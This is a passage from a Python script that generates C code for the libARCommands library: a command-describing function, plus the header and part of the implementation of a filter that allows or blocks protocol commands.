cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (uint8_t *buffer, int32_t buffLen, char *resString, int32_t stringLen)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' int32_t offset = 0;\n')
cfile.write (' int32_t error = 0;\n')
cfile.write (' int strOffset = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if ((NULL == buffer) || (NULL == resString))\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> keep retVal to OK if init went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, &offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' && stringLen > 0)\n')
cfile.write (' {\n')
cfile.write (' resString[0] = \'\\0\';\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n')
cfile.write (' {\n')
if ftr.classes: #project only
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for cl in ftr.classes:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cl.name + '.' + cmd.name + ':", resString, stringLen, strOffset) ;\n')
if cmd.args:
cfile.write (' if (strOffset > 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + '(buffer, buffLen, &offset, resString, stringLen, &strOffset);\n')
cfile.write (' } // No else --> If first print failed, the next if will set the error code\n')
cfile.write ('\n')
cfile.write (' if (strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cl.name + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
else:
cfile.write (' if (commandClass == ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cmd.name + ':", resString, stringLen, strOffset) ;\n')
if cmd.args:
cfile.write (' if (strOffset > 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + '(buffer, buffLen, &offset, resString, stringLen, &strOffset);\n')
cfile.write (' } // No else --> If first print failed, the next if will set the error code\n')
cfile.write ('\n')
cfile.write (' if (strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no error occured\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) +'.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n')
cfile.write (' default:\n')
cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('// END GENERATED CODE\n')
cfile.close ()
#################################
# 9TH PART : #
#################################
# Generate filter h file #
#################################
hfile = open (paths.COMMANDSFIL_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSFIL_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands filter header.\n')
hfile.write (' * This file contains all declarations needed to create and use a commands filter\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSFIL_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSFIL_DEFINE + '\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Error code for ARCOMMANDS_Filter functions.\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ' = 0, ///< No error.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'ALLOC') + ', ///< Memory allocation error.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ', ///< The given status is not a valid status.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ', ///< The given filter is not a valid filter.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ', ///< The given buffer is not a valid buffer.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OTHER') + ', ///< Any other error.\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ' = 0, ///< The command should pass the filter\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ', ///< The command should not pass the filter\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ', ///< Unknown command. The command was possibly added in a newer version of libARCommands, or is an invalid command.\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ERROR') + ', ///< The filtering of the command failed.\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief ARCOMMANDS_Filter object holder\n')
hfile.write (' */\n')
hfile.write ('typedef struct ARCOMMANDS_Filter_t ARCOMMANDS_Filter_t;\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Creates a new ARCOMMANDS_Filter_t\n')
hfile.write (' * @param defaultBehavior The default behavior of the filter (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @param error Optionnal pointer which will hold the error code.\n')
hfile.write (' * @warning This function allocates memory.\n')
hfile.write (' * @note The memory must be freed by a call to ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + '.\n')
hfile.write (' * @return A new ARCOMMANDS_Filter_t instance. NULL in case of error.\n')
hfile.write (' */\n')
hfile.write ('ARCOMMANDS_Filter_t* ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' defaultBehavior, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Deletes an ARCOMMANDS_Filter_t\n')
hfile.write (' * @param filter The filter to delete.\n')
hfile.write (' */\n')
hfile.write ('void ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (ARCOMMANDS_Filter_t **filter);\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Filter an ARCommand\n')
hfile.write (' * @param filter The ARCOMMANDS_Filter_t to use for filtering.\n')
hfile.write (' * @param buffer The ARCommand buffer.\n')
hfile.write (' * @param len The ARCommand buffer length.\n')
hfile.write (' * @param error Optionnal pointer which will hold the error code.\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' status code\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (ARCOMMANDS_Filter_t *filter, uint8_t *buffer, uint32_t len, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error);\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('// Filter ON/OFF functions')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for all commands ' + get_ftr_old_name(ftr) + '.XXX.XXX.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the commands (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
if ftr.classes: #project only
for cl in ftr.classes:
hfile.write ('// Command class ' + cl.name + '\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for all commands ' + get_ftr_old_name(ftr) + '.' + cl.name + '.XXX.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the commands (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
for cmd in cl.cmds:
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for the command ' + get_ftr_old_name(ftr) + '.' + cl.name + '.' + cmd.name + '.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the command (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
hfile.write ('\n')
else:
for cmd in ftr.cmds + ftr.evts:
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for the command ' + get_ftr_old_name(ftr) + '.' + cmd.name + '.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the command (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSFIL_DEFINE + ' */\n')
hfile.close ()
#################################
# 10TH PART : #
#################################
# Generate filter c file #
#################################
cfile = open (paths.COMMANDSFIL_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// ARCOMMANDS_Filter_t structure definition\n')
cfile.write ('struct ARCOMMANDS_Filter_t\n')
cfile.write ('{\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior;\n')
cfile.write ('\n')
cfile.write ('};\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// Constructor\n')
cfile.write ('ARCOMMANDS_Filter_t* ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' defaultBehavior, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *retFilter = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' if ((defaultBehavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (defaultBehavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' retFilter = malloc (sizeof (struct ARCOMMANDS_Filter_t));\n')
cfile.write (' if (retFilter == NULL)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'ALLOC') + ';\n')
cfile.write (' } // No else : Error processing.\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' // Setup default behavior\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' retFilter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = defaultBehavior;\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (error != NULL)\n')
cfile.write (' {\n')
cfile.write (' *error = localError;\n')
cfile.write (' } // No else : Set error only if pointer is not NULL\n')
cfile.write (' return retFilter;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (ARCOMMANDS_Filter_t **filter)\n')
cfile.write ('{\n')
cfile.write (' if ((filter != NULL) &&\n')
cfile.write (' (*filter != NULL))\n')
cfile.write (' {\n')
cfile.write (' free (*filter);\n')
cfile.write (' *filter = NULL;\n')
cfile.write (' } // No else : No need to delete an invalid filter instance\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (ARCOMMANDS_Filter_t *filter, uint8_t *buffer, uint32_t len, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' int32_t offset = 0;\n')
cfile.write (' int32_t readError = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' retStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ';\n')
cfile.write ('\n')
cfile.write (' // Args check\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((buffer == NULL) ||\n')
cfile.write (' (len < 4))\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, len, &offset, &readError);\n')
cfile.write (' if (readError == 1)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, len, &offset, &readError);\n')
cfile.write (' if (readError == 1)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, len, &offset, &readError);\n')
cfile.write (' if (readError == 1)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n')
cfile.write (' {\n')
if ftr.classes:
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for cl in ftr.classes:
